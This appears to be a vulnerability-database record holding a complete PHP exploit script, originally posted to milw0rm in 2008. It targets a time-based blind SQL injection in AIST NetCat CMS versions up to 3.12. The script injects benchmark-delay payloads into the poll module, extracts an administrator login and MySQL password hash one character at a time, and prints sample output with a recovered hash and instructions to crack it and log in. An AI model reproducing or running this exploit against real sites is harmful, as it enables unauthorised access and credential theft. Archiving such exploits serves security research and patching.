Description
No description provided by source.
{"sourceData": "\n <?\n\n/*\n\tAIST NetCat Blind SQL Injection exploit by s4avrd0w [s4avrd0w@p0c.ru]\n\tVersions affected <= 3.12\n\n\tMore info: http://www.netcat.ru/\n\n\t* tested on version 3.0, 3.12\n\n\tusage: \n\n\t# ./NetCat_blind_SQL_exploit.php -s=NetCat_server -u=User_ID\n\n\tThe options are required:\n\t -u The user identifier (number in table)\n\t -s Target for exploiting\n\n\texample:\n\n\t# ./NetCat_blind_SQL_exploit.php -s=http://localhost/netcat/ -u=2\n\n\t[+] Phase 1 brute login.\n\t[+] Brute 1 symbol...\n\t...........a\n\t[+] Brute 2 symbol...\n\t..............d\n\t[+] Brute 3 symbol...\n\t.......................m\n\t[+] Brute 4 symbol...\n\t...................i\n\t[+] Brute 5 symbol...\n\t........................n\n\t[+] Brute 6 symbol...\n\t.....................................\n\t[+] Phase 1 successfully finished: admin\n\t[+] Phase 2 brute password-hash.\n\t[+] Brute 1 symbol...\n\t*\n\t[+] Brute 2 symbol...\n\t.0\n\t[+] Brute 3 symbol...\n\t.0\n\t[+] Brute N symbol...\n\t\n\t<...>\n\t\n\t[+] Brute 42 symbol...\n\t.....................................\n\t[+] Phase 2 successfully finished: *00a51f3f48415c7d4e8908980d443c29c69b60c9\n\t\n\t\n\t[+] Exploiting is finished successfully\n\t[+] Login - admin\n\t[+] MySQL hash - *00a51f3f48415c7d4e8908980d443c29c69b60c9\n\t[+] Decrypt MySQL hash and login into NetCat CMS.\n\n*/\n\n\nfunction http_connect($query)\n{\n\n\tglobal $server;\n\n\t$headers = array(\n\t 'User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14',\n\t 'Referer' => $server\n\t);\n\n\t$res_http = new HttpRequest($server."modules/poll/?cc=62&PollID=1".$query, HttpRequest::METH_GET);\n\t$res_http->addHeaders($headers);\n\n\t$t = mktime();\n\ttry {\n\t\t$response = $res_http->send()->getBody();\n\n\t\t$t = mktime() - $t;\n\n\t\tif ($t > 4)\n\t\t{\n\t\t\treturn 1;\n\t\t}\n\t\telse\n\t\t{\n\t\t\treturn 0;\n\t\t}\n\n\t} catch (HttpException $exception) {\n\n\t\tprint "[-] Not connected";\n\t\texit(0);\n\n\t}\n\n}\n\nfunction brute($User_id,$table)\n{\n\t$ret_str = "";\n\n\tif ($table == "Password")\n\t{\n\t\t$b_str = "*1234567890abcdef";\n\t}\n\telse\n\t{\n\t\t$b_str = "1abcdefghijklmnopqrstuvwxyz_234567890 !'#%&()*+,-./:;<=>?@[\\]^{|}~\u00c3\u00a0\u00c3\u00a1\u00c3\u00a2\u00c3\u00a3\u00c3\u00a4\u00c3\u00a5\u00c3\u00a6\u00c3\u00a7\u00c3\u00a8\u00c3\u00a9\u00c3\u00aa\u00c3\u00ab\u00c3\u00ac\u00c3\u00ad\u00c3\u00ae\u00c3\u00af\u00c3\u00b0\u00c3\u00b1\u00c3\u00b2\u00c3\u00b3\u00c3\u00b4\u00c3\u00b5\u00c3\u00b6\u00c3\u00b7\u00c3\u00b8\u00c3\u00b9\u00c3\u00ba\u00c3\u00bb\u00c3\u00bc\u00c3\u00bd\u00c3\u00be\u00c3\u00bf\u00c5\u00be";\n\t}\n\n\t$b_arr = str_split($b_str);\n\n\tfor ($i=1;$i<43;$i++)\n\t{\n\t\tprint "[+] Brute $i symbol...\\n";\n\n\t\tfor ($j=0;$j<count($b_arr);$j++)\n\t\t{\n\t\t\t$brute = ord($b_arr[$j]);\n\t\t\t$q = "/**/AND/**/1=if((ASCII(lower(SUBSTRING((SELECT/**/$table/**/FROM/**/USER/**/limit/**/$User_id,1),$i,1))))=$brute,benchmark(1,benchmark(2000000,md5(now()))),0)";\n\n\t\t\tif (http_connect($q))\n\t\t\t{\n\t\t\t\t$ret_str=$ret_str.$b_arr[$j];\n\t\t\t\tprint $b_arr[$j]."\\n";\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\tprint ".";\n\n\n\t\t}\n\n\t\tif ($j == count($b_arr)) break;\n\t}\n\n\treturn $ret_str;\n}\n\n\nfunction help_argc($script_name)\n{\nprint "\nusage:\n\n# ./".$script_name." -s=NetCat_server -u=User_ID\n\nThe options are required:\n -u The user identifier (number in table)\n -s Target for exploiting\n\nexample:\n\n# ./".$script_name." -s=http://localhost/netcat/ -u=1\n[+] Phase 1 brute login.\n[+] Brute 1 symbol...\n..1\n[+] Brute 2 symbol...\n.....................................\n[+] Phase 1 successfully finished: 1\n[+] Phase 2 brute password-hash.\n[+] Brute 1 symbol...\n.....................................\n[+] Phase 2 successfully finished:\n\n\n[+] Exploiting is finished successfully\n[+] Login - 1\n[+] MySQL hash -\n[+] You can login into NetCat CMS with the empty password\n";\n}\n\nfunction successfully($login,$hash)\n{\nprint "\n\n[+] Exploiting is finished successfully\n[+] Login - $login\n[+] MySQL hash - $hash\n";\n\nif ($hash) print "[+] Decrypt MySQL hash and login into NetCat CMS.\\n";\nelse print "[+] You can login into NetCat CMS with the empty password\\n";\n\n}\n\nif (($argc != 3) || in_array($argv[1], array('--help', '-help', '-h', '-?')))\n{\n\thelp_argc($argv[0]);\n\texit(0);\n}\nelse\n{\n\t$ARG = array(); \n\tforeach ($argv as $arg) { \n\t\tif (strpos($arg, '-') === 0) { \n\t\t\t$key = substr($arg,1,1);\n\t\t\tif (!isset($ARG[$key])) $ARG[$key] = substr($arg,3,strlen($arg)); \n\t\t} \n\t}\n\n\tif ($ARG[s] && $ARG[u])\n\t{\n\t\t$server = $ARG[s];\n\t\t$User_id = intval($ARG[u]);\n\t\t$User_id--;\n\n\t\tprint "[+] Phase 1 brute login.\\n";\n\t\t$login = brute($User_id,"Login");\n\t\tprint "\\n[+] Phase 1 successfully finished: $login\\n";\n\n\t\tprint "[+] Phase 2 brute password-hash.\\n";\n\t\t$hash = brute($User_id,"Password");\n\t\tprint "\\n[+] Phase 2 successfully finished: $hash\\n";\n\n\t\tsuccessfully($login,$hash);\n\t}\n\telse\n\t{\n\t\thelp_argc($argv[0]);\n\t\texit(0);\n\t}\n\n}\n\n?> \n\n# milw0rm.com [2008-12-29]\n\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-17678", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-17678", "type": "seebug", "viewCount": 4, "references": [], "lastseen": "2017-11-19T19:04:30", "published": "2008-12-29T00:00:00", "cvelist": [], "id": "SSV:17678", "enchantments_done": [], "modified": "2008-12-29T00:00:00", "title": "CMS NetCat 3.0/3.12 Blind SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.2}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645461863}}
{}
CMS NetCat 3.0/3.12 Blind SQL Injection Exploit